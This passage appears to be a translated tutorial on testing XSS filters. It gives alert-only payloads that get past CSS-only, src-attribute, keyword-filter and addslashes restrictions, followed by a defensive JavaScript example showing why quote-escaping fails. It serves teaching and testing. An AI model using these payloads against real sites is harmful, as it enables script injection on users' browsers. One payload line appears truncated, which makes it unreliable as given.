```html
<script>alert(/xss/);</script>
```
- Restrictions: only CSS can be used; HTML tags are not allowed
We know that CSS `expression()` can be used to construct an XSS payload, but it only works in IE, so run the following test in IE6.
```css
body {
  background: black;               /* assumed property: the original line was garbled to "black;" */
  xss: expression(alert(/xss/));   /* tested under IE6 */
}
```
- Restrictions: HTML is escaped and the image tag is available
The characters you enter are inserted into the src attribute, so a pseudo-protocol can be used to bypass the escaping.
Enter directly:
```
alert( /xss/);
```
Or use an event handler to bypass it; just make sure the surrounding statement is closed correctly, as follows:
```
1" onerror=alert(/xss/); var a="1
```
- Restriction: keyword filtering is applied.
I tested it: most of it was filtered, but some was not. After testing, script/onerror were filtered, but onclick was not filtered. Use the onclick event to bypass it:
```html
<img src=# onclick=alert(/xss/);>
```
- Restrictions: addslashes is used to escape special characters
That is to say, characteristic characters such as single quotes and double quotes cannot appear in our XSS statement.
Use the following directly to bypass it (the payload contains no quotes at all):
```html
<script>alert(/xss/);</script>
```
Or use the String.fromCharCode method, as follows:
```html
<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>
```
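The keyword-filter and addslashes tests above share one lesson: escaping quote characters or blocking a few keywords does nothing against payloads that contain no quotes, while context-aware output encoding neutralises them, and an allow-list on the src scheme covers the image case. The following is an added example written for this page (not code from the original post); `addslashes`, `htmlEncode`, `canOpenTag` and `safeImageSrc` are hypothetical names, and the payload list is copied from the page.

```javascript
// Added example (not from the original page): why addslashes-style quote
// escaping does not neutralise the payloads above, and what does.

// Mimic PHP addslashes(): backslash-escape single quote, double quote,
// backslash and NUL. Nothing else is touched.
function addslashes(s) {
  return s.replace(/[\\'"\0]/g, (c) => '\\' + c);
}

// Context-aware output encoding for HTML text and attribute values.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Demo check: can this output still open a new element when placed in
// HTML text content? Only a raw '<' followed by a letter can do that.
function canOpenTag(html) {
  return /<[a-z]/i.test(html);
}

// Payloads taken from the page; none of them contains a quote character.
const quoteFreePayloads = [
  '<script>alert(/xss/);</script>',
  '<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>',
  '<img src=# onclick=alert(/xss/);>',
];

// Returns how many of the payloads can still open a tag after the filter.
function countSurvivors(filter) {
  return quoteFreePayloads.filter((p) => canOpenTag(filter(p))).length;
}

// Attribute-context defence for the image src case: allow-list the scheme
// instead of trying to block every spelling of a pseudo-protocol.
function safeImageSrc(input) {
  const url = input.trim();
  return /^https?:\/\//i.test(url) ? htmlEncode(url) : '';
}

console.log('survive addslashes:', countSurvivors(addslashes)); // 3
console.log('survive htmlEncode:', countSurvivors(htmlEncode)); // 0
```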
The above is the detailed content of "How is the small test of XSS carried out?". For more information, please follow other related articles on the PHP Chinese website!